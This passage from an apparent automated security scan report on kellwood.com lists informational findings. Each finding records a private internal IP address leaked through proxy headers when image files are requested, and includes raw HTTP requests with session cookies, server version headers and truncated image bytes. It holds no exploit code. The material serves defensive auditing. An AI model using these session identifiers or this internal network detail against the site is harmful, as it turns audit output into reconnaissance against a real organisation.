Path:   /_images/privacyPolicyOff.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /_images/privacyPolicyOff.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/home.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "d621b012eb92ca1:0"
Last-Modified: Mon, 11 Jan 2010 18:22:46 GMT
X-Powered-By: ASP.NET
Content-Length: 417
Date: Mon, 11 Apr 2011 17:19:50 GMT
X-Varnish: 2009432519
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR...U...
........J....tEXtSoftware.Adobe ImageReadyq.e<...0PLTE...[[[.........rrr..................~~~fff...OOO.h......IDATx...... .DQ.@.....v...5.CY"...&....TUM.`'.].....V..E....e.....
...[SNIP]...
14.21. http://kellwood.com/_images/separator.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /_images/separator.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /_images/separator.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/home.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "68cc6912eb92ca1:0"
Last-Modified: Mon, 11 Jan 2010 18:22:45 GMT
X-Powered-By: ASP.NET
Content-Length: 136
Date: Mon, 11 Apr 2011 17:19:50 GMT
X-Varnish: 2009432482
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR.......
.............tEXtSoftware.Adobe ImageReadyq.e<...    PLTE~~~...OOO.nv.....IDATx.b`..F...a......{9.K..A.....IEND.B`.
14.22. http://kellwood.com/_images/shim.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /_images/shim.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /_images/shim.gif HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/home.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/gif
ETag: "98705136328ca1:0"
Last-Modified: Fri, 28 Aug 2009 17:15:59 GMT
X-Powered-By: ASP.NET
Content-Length: 43
Date: Mon, 11 Apr 2011 17:19:48 GMT
X-Varnish: 2009431359
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

GIF89a.............!.......,...........D..;
14.23. http://kellwood.com/brand_images/adam.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_images/adam.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_images/adam.jpg HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "7cc189a83754cb1:0"
Last-Modified: Tue, 14 Sep 2010 18:07:13 GMT
X-Powered-By: ASP.NET
Content-Length: 41891
Date: Mon, 11 Apr 2011 17:20:02 GMT
X-Varnish: 2009438091
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

......Exif..II*.................Ducky.......F.....&Adobe.d...........
.."...?...i......................................
.                .

.....
...........................

..................................
...[SNIP]...
14.24. http://kellwood.com/brand_images/babyphat.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_images/babyphat.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_images/babyphat.jpg HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "c88a6ffc8cacb1:0"
Last-Modified: Fri, 11 Feb 2011 16:30:25 GMT
X-Powered-By: ASP.NET
Content-Length: 76480
Date: Mon, 11 Apr 2011 17:19:55 GMT
X-Varnish: 2009434682
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

......Exif..II*.................Ducky.......F.....&Adobe.d...........
..D...tF...%..*..................................
.                .

.....
...........................

..................................
...[SNIP]...
14.25. http://kellwood.com/brand_images/blkdnm.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_images/blkdnm.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_images/blkdnm.jpg HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "2ebf38cb79ecb1:0"
Last-Modified: Fri, 17 Dec 2010 16:31:02 GMT
X-Powered-By: ASP.NET
Content-Length: 11798
Date: Mon, 11 Apr 2011 17:19:53 GMT
X-Varnish: 2009433715
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

......Exif..II*.................Ducky.......F.....&Adobe.d...........
...d......'......................................
.                .

.....
...........................

..................................
...[SNIP]...
14.26. http://kellwood.com/brand_images/briggs.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_images/briggs.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_images/briggs.jpg HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "e43acb883328cb1:0"
Last-Modified: Tue, 20 Jul 2010 17:46:51 GMT
X-Powered-By: ASP.NET
Content-Length: 33935
Date: Mon, 11 Apr 2011 17:19:54 GMT
X-Varnish: 2009434312
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

......JFIF.....d.d......Ducky.......K......Adobe.d...............................................    


   .............................................................................................U....
...[SNIP]...
14.27. http://kellwood.com/brand_images/davidmeister.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_images/davidmeister.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_images/davidmeister.jpg HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "a8d581fb8cacb1:0"
Last-Modified: Fri, 11 Feb 2011 16:30:23 GMT
X-Powered-By: ASP.NET
Content-Length: 22513
Date: Mon, 11 Apr 2011 17:19:52 GMT
X-Varnish: 2009433485
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

......Exif..II*.................Ducky.......F.....&Adobe.d...........
...... T..5)..W..................................
.                .

.....
...........................

..................................
...[SNIP]...
14.28. http://kellwood.com/brand_images/democracy.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_images/democracy.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_images/democracy.jpg HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "be8078b355ecb1:0"
Last-Modified: Thu, 17 Jun 2010 19:45:55 GMT
X-Powered-By: ASP.NET
Content-Length: 79258
Date: Mon, 11 Apr 2011 17:19:54 GMT
X-Varnish: 2009434201
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

......Exif..II*.................Ducky.......[.....&Adobe.d...........
..J6...a......5..................................................................................................................
...[SNIP]...
14.29. http://kellwood.com/brand_images/jax.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_images/jax.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_images/jax.jpg HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "88f5658a3328cb1:0"
Last-Modified: Tue, 20 Jul 2010 17:46:54 GMT
X-Powered-By: ASP.NET
Content-Length: 51898
Date: Mon, 11 Apr 2011 17:19:54 GMT
X-Varnish: 2009434107
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

......Exif..II*.................Ducky.......Z.....&Adobe.d...........
..6...K...tt.....................................................................................................................
...[SNIP]...
14.30. http://kellwood.com/brand_images/jolt.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_images/jolt.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_images/jolt.jpg HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "bc96f91fa053cb1:0"
Last-Modified: Tue, 14 Sep 2010 00:02:30 GMT
X-Powered-By: ASP.NET
Content-Length: 87712
Date: Mon, 11 Apr 2011 17:19:53 GMT
X-Varnish: 2009433719
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

......Exif..II*.................Ducky.......F.....&Adobe.d...........
..I........m..V..................................
.                .

.....
...........................

..................................
...[SNIP]...
14.31. http://kellwood.com/brand_images/koret.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_images/koret.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_images/koret.jpg HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "aeb4208b3328cb1:0"
Last-Modified: Tue, 20 Jul 2010 17:46:55 GMT
X-Powered-By: ASP.NET
Content-Length: 119234
Date: Mon, 11 Apr 2011 17:19:55 GMT
X-Varnish: 2009434649
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

......JFIF.....d.d......Ducky.......U......Adobe.d...........................................................


.....................
...
.......................................................U....
...[SNIP]...
14.32. http://kellwood.com/brand_images/logo_adam.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_images/logo_adam.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_images/logo_adam.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "da20cca83754cb1:0"
Last-Modified: Tue, 14 Sep 2010 18:07:14 GMT
X-Powered-By: ASP.NET
Content-Length: 2208
Date: Mon, 11 Apr 2011 17:19:56 GMT
X-Varnish: 2009435224
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR...y...#.............tEXtSoftware.Adobe ImageReadyq.e<...BIDATx..[yl.U...R....[.X.Bk@9.CT0F.FD../..!B...L..#...H......D....1j....(.Z.
..-.s...o.e..}o..n..._fwv..{.{..f....    .I<G.X.C;b
...[SNIP]...
14.33. http://kellwood.com/brand_images/logo_babyphat.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_images/logo_babyphat.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_images/logo_babyphat.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "908e4f6c1fcacb1:0"
Last-Modified: Fri, 11 Feb 2011 19:11:02 GMT
X-Powered-By: ASP.NET
Content-Length: 2667
Date: Mon, 11 Apr 2011 17:19:59 GMT
X-Varnish: 2009436206
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR...Y...7.............tEXtSoftware.Adobe ImageReadyq.e<..
IDATx.b...?.:VWQ..M...A.)...D.S....zl.$;    .IU.~..UU....    .i.6@...6.%tT..@.....X#.F.%..".IX=.......h....YXL...4....0O.M...dd.....
...[SNIP]...
14.34. http://kellwood.com/brand_images/logo_blkdnm.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_images/logo_blkdnm.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_images/logo_blkdnm.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "4cd4d6cc79ecb1:0"
Last-Modified: Fri, 17 Dec 2010 16:31:04 GMT
X-Powered-By: ASP.NET
Content-Length: 2236
Date: Mon, 11 Apr 2011 17:19:56 GMT
X-Varnish: 2009435245
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...^IDATx.b```8.... ..J. ......Y.... .2......P    !(.    ..h....(.D3..\FFF...H.:....3 >...@\..    ...b \.$.........;.........A......^..d..
...[SNIP]...
14.35. http://kellwood.com/brand_images/logo_briggs.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_images/logo_briggs.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_images/logo_briggs.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "7e6b38b3328cb1:0"
Last-Modified: Tue, 20 Jul 2010 17:46:56 GMT
X-Powered-By: ASP.NET
Content-Length: 2391
Date: Mon, 11 Apr 2011 17:19:57 GMT
X-Varnish: 2009435667
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR...0...0.....`.    .....tEXtSoftware.Adobe ImageReadyq.e<....PLTE#. "..3/0:78!.. ..!.."..)&'201*'(...#..|z{988<::'$%......IIIjih&##......%""644*((<<<-*,967%!";;:...&#"@@@...$ !HEF?>>!..($
...[SNIP]...
14.36. http://kellwood.com/brand_images/logo_davidmeister.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_images/logo_davidmeister.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_images/logo_davidmeister.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "2e94e88b3328cb1:0"
Last-Modified: Tue, 20 Jul 2010 17:46:56 GMT
X-Powered-By: ASP.NET
Content-Length: 1072
Date: Mon, 11 Apr 2011 17:19:56 GMT
X-Varnish: 2009435209
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR............. c,)....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Y.q.0..s..:A...q'.5A.    "M g........q'.<A..zU7.......G.PD.    .x>Y$.....5..).F......W..K.'......u...]}..B.kAGP.}.S;.....X...
...[SNIP]...
14.37. http://kellwood.com/brand_images/logo_democracy.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_images/logo_democracy.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_images/logo_democracy.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "f02cc6b455ecb1:0"
Last-Modified: Thu, 17 Jun 2010 19:45:57 GMT
X-Powered-By: ASP.NET
Content-Length: 8039
Date: Mon, 11 Apr 2011 17:19:57 GMT
X-Varnish: 2009435650
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR...B...=.....n'.j....tEXtSoftware.Adobe ImageReadyq.e<...    IDATx.b............O.......<`8t.....a&.$p..Y.y..M.w....8..i...E....................P.,H.%66.....G.~.......i.?.HKK....
1j..M.
...[SNIP]...
14.38. http://kellwood.com/brand_images/logo_jax.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /brand_images/logo_jax.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /brand_images/logo_jax.png HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/kwd_brands.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
